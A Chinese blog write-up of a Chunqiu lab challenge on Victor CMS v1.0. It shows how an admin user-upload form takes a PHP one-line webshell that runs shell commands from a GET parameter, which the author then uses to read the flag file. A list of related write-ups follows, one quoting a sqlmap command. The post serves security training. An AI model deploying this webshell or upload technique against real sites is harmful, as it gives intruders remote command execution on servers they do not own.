春秋云镜 CVE-2022-26201/ CVE-2021-25203

已于 2023-08-02 23:42:05 修改
阅读量227 收藏 1
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
于 2023-07-22 07:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/131800153
版权

春秋云镜 CVE-2022-26201( CVE-2021-25203) Victor CMS v1.0 存在二次注入漏洞

靶标介绍

Victor CMS v1.0 存在二次注入漏洞,与CVE-2022-28060同一套cms。

启动场景

在这里插入图片描述

漏洞利用

(此题利用漏洞为 CVE-2021-25203Victor-CMS 1.0 —— 任意文件上传漏洞)
进入“Admin”页面

在这里插入图片描述

“Users” / “add users”

在这里插入图片描述
构造一句话木马shell.php

<?php system($_GET[cmd]);?>

直接上传shell.php
在这里插入图片描述
http://eci-2ze0t0n7rf1wsq9bk77e.cloudeci1.ichunqiu.com/img/shell.php?cmd=cat /flag
在这里插入图片描述
得到flag

flag{ad1e4db5-9b69-4d0b-8dc7-54346c050399}

isbug0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
春秋CVE-2022-26201 Victor CMS v1.0 存在二次注入漏洞 解题思路
Dark-Specter的博客
12-16 1158
二次注入漏洞(Second-Order Injection Vulnerability)是一种安全漏洞,通常出现在Web应用程序中。它是基于用户输入的攻击,类似于常见的SQL注入漏洞,但与之不同的是,二次注入漏洞不是直接在用户提供的输入上发生,而是在稍后的某个阶段或请求中。:二次注入漏洞的原理在于,Web应用程序在某个阶段(通常是数据存储或处理阶段)没有充分地验证、过滤或转义用户输入,然后将该输入存储到数据库、文件或其他存储设备中。
春秋境:CVE-2022-26201
一只爱吃橙子的羊
11-30 1140
Victor CMS v1.0 存在二次注入漏洞
春秋境:CVE-2022-26201(二次注入漏洞)
m0_65712192的博客
04-21 1226
Victor CMS v1.0 存在二次注入漏洞
CVE-2022-26201靶场WP
果粒程
11-29 891
CVE-2022-26201靶场WP
春秋 CVE-2022-26201
qq_22002773的博客
07-23 210
春秋 CVE-2022-26201
Victor CMS 二次注入漏洞(CVE-2022-26201)
weixin_68999845的博客
08-17 818
1.下载源码到本地:https://codeload.github.com/VictorAlagwu/CMSsite/zip/refs/heads/master。源码下载url:https://codeload.github.com/VictorAlagwu/CMSsite/zip/refs/heads/master。语句接收$cat_title并未过滤,单引号、右括号闭合,即可插入sql注入语句,运用insert语句完成二次注入。·漏洞名称:Victor CMS 二次注入漏洞。目前最高版本:v1.0。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2022-26201-春秋境.com-Victor CMS v1.0 存在二次注入漏洞
qq_42036164的博客
01-19 211
靶标介绍: Victor CMS v1.0 存在二次注入漏洞
Victor CMS v1.0 存在sql注入
weixin_46420165的博客
12-08 733
Victor CMS v1.0 /includes/login.php 存在sql注入。
春秋wp day1
xy404的博客
10-13 3588
今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷,比打CTF轻松多了。
[春秋wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag
qq_49199168的博客
10-30 2245
[春秋wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag
Victor CMS 未授权sql注入(CVE-2020-29280)
00勇士王子的博客
08-08 748
漏洞名称 Victor CMS 未授权sql注入 漏洞等级 高危 爆发时间 2020-11-27 漏洞简介 Victor CMS是一个简单的内容管理系统。 Victor CMS存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。 影响版本 The Victor CMS v1.0 漏洞复现 这里用的是演的在线环境,这个漏洞的环境是免费的 打开漏洞环境,根据漏洞描述,漏洞应该存在于search搜索框 用burp抓搜索框的包,发现是传入的是post参数search 单引号报错 加上注释后页面返回正常
Victor CMS 未授权sql注入(CVE-2020-29280)漏洞复现
锋刃科技的博客
12-19 1424
0X00简介 The Victor CMS v1.0版本存在安全漏洞,该漏洞源于通过search.php页面上的“search”参数造成的。 0X01影响范围 The Victor CMS v1.0 0X02漏洞复现 在search.php中search参数未经过滤就直接和sql语句拼接导致sql注入漏洞 1.访问首页点击搜索框,测试 直接上sqlmap, python.exe .\sqlmap.py -u "http://mode.com/search.php" --data
面试经验分享 | 24年6月某安全厂商HW面试经验
最新发布
zkaqlaoniao的博客
06-17 612
也希望大家有什么护网相关的需求和建议都可以留在评论区,大家讨论下,嘿嘿嘿,希望大家伙都可以通过今年的护网面试。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。反射型XSS:反射型XSS攻击是一次性的攻击,当受害者点击恶意链接url的时候,恶意代码会直接在受害者的主机上的浏览器执行。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
在物联网设备安全中,如何有效进行固件更新管理?
2403_84237550的博客
06-17 418
• 更新后持续监控设备状态,评估更新效果,及时发现并解决更新带来的新问题。在物联网设备安全中,有效进行固件更新管理是一个关键环节,涉及到多个步骤和策略,以确保更新过程既安全又高效。• 在部署固件更新前,进行全面的安全验证和兼容性测试,确保更新包的来源可靠,未被篡改,并且不会影响设备的正常运行。• 记录每次固件更新的详细信息,包括更新时间、版本号、更新内容和操作人员等,以便追溯和审计。• 加强用户对固件更新重要性的认识,教育用户如何正确执行和验证更新,提升整体安全意识。
春秋CVE-2022-0543
09-04
根据提供的引用内容,春秋CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值